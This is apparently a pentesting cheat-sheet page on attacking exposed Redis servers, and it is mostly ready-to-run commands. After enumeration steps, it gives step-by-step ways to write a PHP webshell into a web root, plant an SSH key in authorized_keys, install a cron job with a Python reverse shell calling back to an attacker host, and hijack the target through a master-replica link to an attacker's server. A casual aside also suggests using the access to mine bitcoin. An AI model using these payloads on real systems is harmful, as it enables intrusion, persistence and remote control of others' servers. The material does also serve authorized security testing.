Physical attacks
Mobile Apps Pentesting
Pentesting

6379 - Pentesting Redis

Basic Information

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker (from here).

Default port: 6379

PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.9

Enumeration

nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server

Authenticated enumeration

Several times redis will be configured to be accessible anonymously. In this case you won't need to use any username and password. Talk to redis service and execute the info command, it will let you know a lot of information about the server: SO running, Clients, memory... Another interesting command to run is config get * this will let you know several strings related to the service and one of them could be the home of the redis user (/var/lib/redis, another possible path could be /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file. You can also use keys * to list the keys and the get <key> to get them.

sudo apt-get install redis-tools
redis-cli -h 192.168.0.24
192.168.0.24:6379> info
192.168.0.24:6379> CONFIG GET *
192.168.0.24:6379> keys *
192.168.0.24:6379> get 351115ba5f690fb9b1bdc1b41e673a94 #This is a key list on the last command

Other redis commands can be found here Dump the database with redis-dump

Automated Exploitation

To exploit a bad configured Redis you should try: https://github.com/Avinash-acid/Redis-Server-Exploit

Get Webshell

From: http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html

​ You must know the path of the Web site folder:

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK

​If the webshell access exception, you can empty the database after backup and try again, remember to restore the database.

Get SSH–Crackit

  1. Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa

  2. Write the public key to a file : (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

  3. Import the file into redis : cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit

  4. Save the public key to the authorized_keys file on redis server:

    root@Urahara:~# redis-cli -h 10.85.0.52
    10.85.0.52:6379> config set dir /home/test/.ssh/
    OK
    10.85.0.52:6379> config set dbfilename "authorized_keys"
    OK
    10.85.0.52:6379> save
    OK
  5. Finally, you can ssh to the redis server with private key : ssh -i id_rsa test@10.85.0.52

Get Reverse Shell—Crontab

root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK

The last exampleis for Ubuntu, for Centos, the above command should be: redis-cli -h 10.85.0.52 config set dir /var/spool/cron/

This method can also be used to earn bitcoin :yam

Master-Slave Module

​The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis.

master redis : 10.85.0.51 (Hacker's Server)
slave redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld